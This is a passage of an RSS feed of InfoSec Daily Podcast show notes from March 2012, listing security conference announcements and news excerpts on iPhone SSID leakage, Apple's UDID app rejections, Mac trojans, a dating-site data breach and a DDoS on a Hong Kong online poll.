<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></p>
<p><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012<br class="kix-line-break" /><br />
	Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> <br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Bristol, UK</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012<br class="kix-line-break" /><br />
	When: July 23 &#8211; 24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas<br class="kix-line-break" /><br />
	</span><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012<br class="kix-line-break" /><br />
	Where: Louisville, KY<br class="kix-line-break" /><br />
	</span><a href="http://www.derbycon.com/"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Skydogcon</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><br class="kix-line-break" /><br />
	When: October 26-28, 2012<br class="kix-line-break" /><br />
	Where: Hotel Preston in Nashville, TN <br class="kix-line-break" /><br />
	</span><a href="http://www.skydogcon.com/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.skydogcon.com</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.novainfosecportal.com/2012/03/19/stalker-app-strikes-back-at-iphones-starbucks"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.novainfosecportal.com/2012/03/19/stalker-app-strikes-back-at-iphones-starbucks</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Surprised there wasn&rsquo;t more coverage on this story in the news on Friday&hellip; Basically, Mark Wuergler of Immunity Inc. found that the iPhone advertises the last three SSIDs it connected to, exposing the MAC addresses of those routers/access points as well. With this information anyone could then use a service like Google Location Services or Wireless Geographic Logging Engine to pinpoint exactly where a particular user has been. The same vulnerability is present on many of Apple&rsquo;s other WiFi-enabled iOS devices as well. Here&rsquo;s the relevant part of the ArsTechnica &ldquo;Loose-lipped iPhones top the list of smartphones exploited by hacker&rdquo; article I came across.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">That&rsquo;s because the iPhone is the only smartphone he knows of that transmits to anyone within range the unique identifiers of the past three wireless access points the user has logged into. He can then use off-the-shelf hardware to passively retrieve the routers&rsquo; MAC (media access control) addresses and look them up in databases such as Google Location Services and the Wireless Geographic Logging Engine. By allowing him to pinpoint the precise location of the wireless network, iPhones give him a quick leg-up when performing reconnaissance on prospective marks.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The article goes on to discuss an app Mark created called &ldquo;Stalker&rdquo; that automates collecting, parsing, and viewing not only of this iPhone data but tons of other sensitive information from any open WiFi hotspot. Previously, slurping this network traffic could have been done by anyone just sniffing an open wireless network but Stalker obviously &ldquo;firesheeps&rdquo; things to the next level.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Running on a laptop, Stalker vacuums up passwords, images, email and any other data that is sent unencrypted and organizes it in an easy-to-read interface.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://techcrunch.com/2012/03/24/apple-udids/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://techcrunch.com/2012/03/24/apple-udids/</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Amid extra scrutiny from Congress around privacy issues, Apple this week has started rejecting apps that access UDIDs, or identification numbers that are unique to every iPhone and iPad.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Apple had already given developers a heads-up about the change more than six months ago when it said in some iOS documentation that it was going to deprecate UDIDs. But it looks like Apple is moving ahead of schedule with pressure from lawmakers and the media. It can take more than a year to deprecate features because developers need time to adjust and change their apps. A few weeks ago, some of the bigger mobile-social developers told me that Apple had reached out and warned them to move away from UDIDs.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But this is the first time Apple has issued outright rejections for using UDIDs.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Everyone&rsquo;s scrambling to get something into place,&rdquo; said Victor Rubba, chief executive of Fluik, a Canadian developer that makes games like Office Jerk and Plumber Crack. &ldquo;We&rsquo;re trying to be proactive and we&rsquo;ve already moved to an alternative scheme.&rdquo; Rubba said he isn&rsquo;t sending any updates until he sees how the situation shakes out in the next few days.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">For those unaware, the UDID is an alphanumeric string that is unique to each Apple device. It&rsquo;s currently used by mobile ad networks, game networks, analytics providers, developers and app testing systems, like TestFlight, for example.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Playhaven, which helps developers monetize more than 1,200 games across iOS and Android, said several of its customers had been rejected in the last week. The company&rsquo;s chief executive Andy Yang says that developers should try and stay as flexible as possible by supporting multiple ID systems until there&rsquo;s a clear replacement.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.f-secure.com/weblog/archives/00002330.html"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.f-secure.com/weblog/archives/00002330.html</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It&#39;s been a while since we last wrote about Mac malware, so I thought it would be good to give our readers an update on what&#39;s been happening during the last few months. Last year we detailed a possible Mac trojan in the making. At that time we were still speculating whether it would be part of a bundle or just a standalone binary. Now it&#39;s clear: a new variant was discovered and it is a full-blown application, complete with an icon.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The sample I analyzed uses thumbnail images/icons of Irina Shayk, apparently taken from the March 2012 issue of FHM (South Africa) magazine. The malicious application bundle is being spread inside an archive file together with other images taken from the magazine hoping that its file type will be overlooked by users.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Nothing else is new besides the implementation. The backdoor payload is still the same but uses a new C&amp;C server. The server is currently active (at time of publication). It is important to take note that the new C&amp;C server still points to the same IP address as the previous variant as mentioned by the folks at ESET. We have reported the server to CERT-FI. Hopefully they will be able notify the proper authorities.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We detect this new variant as Trojan-Dropper:OSX/Revir.C, MD5: 7DBA3A178662E7FF904D12F260F0FFF3.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Moving along &mdash; there&#39;s another more serious OS X malware threat lurking out there. The Flashback trojan, which first appeared around the same time as Revir, is still in the wild. It is using exploits to infect systems without user interaction. Though what it&#39;s exploiting are old Java vulnerabilities (CVE-2011-3544 and CVE-2008-5353), we might begin seeing a real OS X outbreak if the gang upgrades their operation a notch higher and start targeting unpatched vulnerabilities.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.databreaches.net/?p=23736"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.databreaches.net/?p=23736</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">MilitarySingles.com has apparently been hacked. &nbsp;The hack was announced on Twitter earlier today by Operation Digiturk and a database of 163,792 names, usernames, e-mail addresses, IP addresses, and passwords has been dumped on the Internet. &nbsp;The tweet was accompanied by the hashtags #anonymous #antisec #infosec</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">I &nbsp;don&rsquo;t know if the site is aware of the hack and eSingles Inc.&rsquo;s own web site does not seem to exist any more. I sent a courtesy notification to MilitarySingles.com to alert them to the hack with a request that they let this blog know what steps they will take to protect their users.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In any event, if &nbsp;you know a member of the military who uses or has used the site, do them a favor and suggest they change their password on any site where they may have reused it &ndash; including their mil.gov email account.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.theregister.co.uk/2012/03/26/hong_kong_vote_hack/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2012/03/26/hong_kong_vote_hack/</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Two men have been arrested after an online referendum organised by Hong Kong university to poll citizens on their choice of chief executive was disabled in an apparent denial of service attack.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Broadcaster Radio Television Hong Kong (RTHK) reported that the men, aged 17 and 28, were arrested at the weekend after the online poll was disrupted for a large part of Friday and some of Saturday.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hong Kong university&rsquo;s Public Opinion Program set up the &#39;Civic Referendum Project&#39; because people who live in the Special Administrative Region (SAR) of China are not given the power to vote directly for their CEO &ndash; effectively the head of the Hong Kong government.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Instead a pre-selected 1,200-strong Election Committee full of pro-Beijing businessmen is given the task, a fact that is angering a growing number of democracy-hungry locals, especially given that this year&rsquo;s candidates were universally unpopular and tainted with scandal.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AFP reported that Hong Kong uni&rsquo;s back-end systems buckled under the huge volume of traffic.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-629-last-three-ssid-uuid-os-x-malware-militarysingles-and-election-ddos/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3690/0/infosec-daily-podcast-episode-629.mp3" length="21319557" type="audio/mpeg" />
		<itunes:duration>0:44:22</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 629 for March 26, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Beau Woods, and Karthik Rangarajan.
&#160;
Announcements:
InfoSec Southwest
	When: March 30-April 1, 2012
	Where: Austin, Texas
	htt[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 629 for March 26, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Beau Woods, and Karthik Rangarajan.
&#160;
Announcements:
InfoSec Southwest
	When: March 30-April 1, 2012
	Where: Austin, Texas
	http://www.Infosecsouthwest.com
&#160;
Outerz0ne 8
	When: April 20-21, 2012
	Where: Wellesley Inn, Atlanta GA
	http://www.outerz0ne.org 
&#160;
Linuxfest Northwest 2012
	When: Saturday, April 28-29, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
&#160;
AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center &#160;- Huntington, West Virginia
	http://www.appyide.org/
&#160;
LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA 
	http://www.sans.org/mentor/details.php?nid=28014
	&#160;
Social Engineering Training
When: July 21-24, 2012
	Where: Black Hat Vegas
When: August 20-24, 2012
	Where: &#160;Bristol, UK
When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
http://www.social-engineer.com/social-engineer-training
&#160;
Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
&#160;
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
&#160;
Skydogcon
	When: October 26-28, 2012
	Where: Hotel Preston in Nashville, TN 
	http://www.skydogcon.com 
&#160;
Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
&#160;
You don't have a sufficient version of Flash Player to display this animation.
&#160;
Stories
Source: &#160;http://www.novainfosecportal.com/2012/03/19/stalker-app-strikes-back-at-iphones-starbucks
Surprised there wasn&#8217;t more coverage on this story in the news on Friday&#8230; Basically, Mark Wuergler of Immunity Inc. found that the iPhone advertises the last three SSIDs it connected to, exposing the MAC addresses of those routers/access points as well. With this information anyone could then use a service like Google Location Services or Wireless Geographic Logging Engine to pinpoint exactly where a particular user has been. The same vulnerability is present on many of Apple&#8217;s other WiFi-enabled iOS devices as well. Here&#8217;s the relevant part of the ArsTechnica &#8220;Loose-lipped iPhones top the list of smartphones exploited by hacker&#8221; article I came across.
&#160;
That&#8217;s because the iPhone is the only smartphone he knows of that transmits to anyone within range the unique identifiers of the past three wireless access points the user has logged into. He can then use off-the-shelf hardware to passively retrieve the routers&#8217; MAC (media access control) addresses and look them up in databases such as Google Location Services and the Wireless Geographic Logging Engine. By allowing him to pinpoint the precise location of the wireless network, iPhones give him a quick leg-up when performing reconnaissance on prospective marks.
&#160;
The article goes on to discuss an app Mark created called &#8220;Stalker&#8221; that automates collecting, parsing, and viewing not only of this iPhone data but tons of other sensitive information from any open WiFi hotspot. Previously, slurping this network traffic could have been done by anyone just sniffing an open wireless network but Stalker obviously &#8220;firesheeps&#8221; things to the next level.
&#160;
Running on a laptop, Stalker vacuums up passwords, images, emai[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 628 &#8211; Weekend Wrap-up with Dr. b0n3z</title>
		<link>http://www.isdpodcast.com/episode-628-weekend-wrap-up-with-dr-b0n3z</link>
		<comments>http://www.isdpodcast.com/episode-628-weekend-wrap-up-with-dr-b0n3z#comments</comments>
		<pubDate>Sun, 25 Mar 2012 01:48:16 +0000</pubDate>
		<dc:creator>Dr Bones</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3684</guid>
		<description><![CDATA[Episode 628 &#8211; Weekend Wrap-up with Dr. b0n3z InfoSec Daily Podcast Episode 628 for March 24, 2012. Tonight&#039;s podcast is hosted by Dr. Bonez, Boris Sverdlick, and Themson Mester. Guests: oncee, connection, and spridel Announcements: InfoSec Southwest When: March 30-April 1, 2012 Where: Austin, Texas http://www.Infosecsouthwest.com Outerz0ne 8 When: April 20-21, 2012 Where: Wellesley Inn, [...]]]></description>
			<content:encoded><![CDATA[<p><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">Episode 628 &#8211; </span><span style="font-size: 15px;font-family: Verdana;background-color: transparent;vertical-align: baseline">Weekend Wrap-up with Dr. b0n3z</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">InfoSec Daily Podcast Episode 628 for March 24, 2012. </span><span style="font-size: 13px;font-family: Verdana;vertical-align: baseline">Tonight&#039;s podcast is hosted by Dr. Bonez, Boris Sverdlick, and Themson Mester.</span></b></p>
<p><b><br />
